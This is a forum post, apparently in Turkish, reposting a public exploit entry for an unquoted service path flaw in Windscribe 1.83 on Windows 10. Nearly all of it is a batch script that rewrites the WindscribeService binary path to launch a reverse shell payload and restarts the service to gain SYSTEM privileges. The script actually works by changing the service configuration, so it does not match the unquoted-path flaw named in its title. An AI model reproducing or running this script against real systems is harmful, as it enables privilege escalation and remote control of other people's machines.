Hoşgeldin Misafir

Windscribe 1.83 - (WindscribeService) Unquoted Service Path Vulnerability

Asım Gürsoy

mersin
27 Mar 2020
8,833 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Windscribe 1.83 - (WindscribeService) Unquoted Service Path Vulnerability--


Kod:
# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
# Exploit Author: Ethan Seow
# Vendor Homepage: https://windscribe.com
# Version: v1.83 Build 20
# Tested on: Microsoft Windows 10 Home 10.0.18363 Build 18363
 
 
#filename : exploit.bat
 
#Code start
@echo off
 
sc config WindscribeService binPath="cmd /k {PATH TO REVERSE SHELL e.g.
C:\Users\Public\payload.exe}"
sc stop WindscribeService
sc start WindscribeService
echo Exploit success! SYSTEM reverse shell should be triggered :DDDDD
pause
 
#Code end
 
#  0day.today [2020-06-29]  #